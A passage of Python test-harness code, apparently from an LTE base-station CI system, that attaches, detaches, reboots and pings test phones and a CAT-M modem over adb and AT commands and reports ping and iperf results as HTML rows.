self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
#airplane mode off means call /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def checkDevTTYisUnlocked(self):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
self.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', str(self.ssh.before))
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
self.close()
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session; the picocom command does not handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
self.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', str(self.ssh.before))
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
self.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
# Force closure of picocom but device might still be locked
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session; the picocom command does not handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session; the picocom command does not handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Enabling the Radio
self.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# Check whether the module has registered
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
self.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', str(self.ssh.before))
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', str(self.ssh.before))
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(str(self.ssh.before))
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
self.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', str(self.ssh.before))
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
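# Convert the AT+CESQ indices to physical values; the offsets below follow the
# usual 3GPP mapping (RSRQ reported in 0.5 dB steps from about -20 dB, RSRP in
# 1 dB steps from -140 dBm).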
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
self.close()
self.picocom_closure = False
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Failed</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
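	# Ping the CAT-M module from the EPC: the module IP address is read from the ltebox xGwLog
	# (the OAI HSS path is not implemented), then packet loss and RTT min/avg/max are parsed.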
def PingCatM(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
try:
statusQueue = SimpleQueue()
lock = Lock()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', str(self.ssh.before))
if result is not None:
moduleIPAddr = result.group('ipaddr')
				else:
					logging.debug('\u001B[1;37;41m Could not retrieve CAT-M module IP address from xGwLog! \u001B[0m')
					return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
device_id = 'catm'
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee -a ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
self.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
except:
os.kill(os.getppid(),signal.SIGUSR1)
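	# Per-UE attach worker (runs in its own process): switch flight mode off through adb, poll
	# "dumpsys telephony.registry" until mDataConnectionState equals 2, retrying the flight-mode
	# toggle twice along the way, and push the outcome to the shared status queue.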
def AttachUE_common(self, device_id, statusQueue, lock):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
time.sleep(0.5)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow('N/A', 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
self.AutoTerminateUEandeNB()
sys.exit(1)
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
def DetachUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.DetachUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
def RebootUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
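			# NOTE: the dumpsys query is issued twice; only the second capture is parsed below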
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
self.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
while count > 0:
count = count - 1
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('adb devices', '\$', 15)
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
for device_id in self.UEDevices:
count = 0
while count < 4:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ip addr show | grep rmnet', '\$', 15)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
					logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ' already exists!\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
self.close()
return ue_ip_status
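	# Push a failure record (status -1, device id, IP address, message) to the shared queue under the lock.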
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
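	# Per-UE ping worker: run ping from the EPC host, parse packet loss and RTT min/avg/max,
	# and flag the run if the loss exceeds the configured threshold.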
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee -a ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Ping(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.ping_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
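	# Extract the test duration from the "-t" iperf option; abort if it is missing.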
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
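	# Rewrite the "-b" bandwidth option according to the traffic profile: "balanced" splits the
	# bandwidth evenly across UEs, "single-ue" keeps it unchanged, "unbalanced" gives the first UE
	# almost everything and the others a 2% residual share.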
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
		iperf_bandwidth = result.group('iperf_bandwidth')
		# default to the requested bandwidth so the value is always defined, even for an unknown profile
		iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
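	# TCP case: aggregate the client log with an awk helper and report average/max/min bitrate.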
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
self.command('awk -f /tmp/tcp_iperf_stats.awk /tmp/CI-eNB/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', str(self.ssh.before))
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
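	# iperf2 client analysis: TCP runs are delegated to the awk-based parser; UDP runs parse the
	# "Server Report" line and compare the achieved bitrate and packet loss against the request.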
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', str(self.ssh.before))
if result is None:
result = re.search('read failed: Connection refused', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
